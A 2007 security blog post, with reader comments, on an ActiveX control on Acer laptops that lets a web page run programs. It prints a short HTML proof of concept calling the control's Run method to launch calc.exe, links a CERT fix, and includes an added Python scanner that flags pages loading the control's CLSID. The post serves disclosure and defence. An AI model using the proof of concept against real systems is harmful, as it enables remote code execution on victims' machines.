Acer Laptops Pre-Owned

Update: 17/01 - Solution section

I just read an article on Slashdot that really made me stare!

Discussion:

Pop question hot shot, what do you think this is:

<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3A A" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</body>
</html>

This is proof-of-concept code (thanks to Koyaanisqatsi). It exploits Acer laptops, which have apparently been backdoored with an ActiveX control since 1998.

I wonder how many other hardware and software vendors provide such feature-rich facilities.

Solution:

So if you have an Acer laptop, install Linux. If you want to stick with Windows, use Firefox, because IE (Internet Explorer) is going to get you owned.
A fix has been provided:
http://www.kb.cert.org/vuls/id/221700
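
A defensive check built on the listing above, added here as an example and not code from the original post: a Python scanner that flags HTML which instantiates this control by CLSID and reports the methods a script calls on it. The function names and the sample are constructed for illustration; the CLSID is the one printed in the listing with its stray space removed.

```python
import re
from html.parser import HTMLParser
# CLSID as printed in this page's proof of concept, stray space removed.
BLOCKED_CLSIDS = {"D9998BD0-7957-11D2-8FED-00606730D3AA"}

def normalize_classid(value):
    """Return the bare upper-case CLSID from a classid attribute, or None."""
    compact = re.sub(r"[\s{}]", "", value or "").upper()
    return compact[6:] if compact.startswith("CLSID:") else None

class ObjectScanner(HTMLParser):
    """Collects blocked <object> tags and the text of every <script> body."""
    def __init__(self):
        super().__init__()
        self.hits, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        clsid = normalize_classid(attr.get("classid"))
        if tag == "object" and clsid in BLOCKED_CLSIDS:
            self.hits.append((self.getpos()[0], attr.get("id"), clsid))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan_html(html):
    """Return one finding per blocked <object>, with methods called on its id."""
    scanner = ObjectScanner()
    scanner.feed(html)
    scanner.close()
    script_text = "\n".join(scanner.scripts)
    findings = []
    for line, element_id, clsid in scanner.hits:
        call = r"\b" + re.escape(element_id or "") + r"\s*\.\s*(\w+)\s*\("
        methods = sorted(set(re.findall(call, script_text))) if element_id else []
        findings.append({"line": line, "id": element_id, "clsid": clsid, "methods": methods})
    return findings

# Constructed sample: lower-case CLSID, placeholder arguments.
SAMPLE = ('<html><body>\n<object classid="clsid:d9998bd0-7957-11d2-8fed-00606730d3aa" id="ctl"></object>\n'
          '<script>ctl.Run("x", "placeholder", "");</script>\n</body></html>')
if __name__ == "__main__":
    print(scan_html(SAMPLE))
```

A finding with a non-empty `methods` list means the page both loads the control and scripts it, which is the pattern in the listing; an empty list means the control is only instantiated.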

2 Comments so far

  1. pdp @ January 8th, 2007

    I have Acer but the POC doesn’t work

  2. david.kierznowski @ January 8th, 2007

    Some comments have come in saying that it may be regional, but interesting nonetheless. If anyone else has an Acer and gives this a try please keep us posted.

    It looks like “Tan Chew Keong” is responsible for finding this back in November last year. His original advisory here: http://vuln.sg/acerlunchapp-en.html
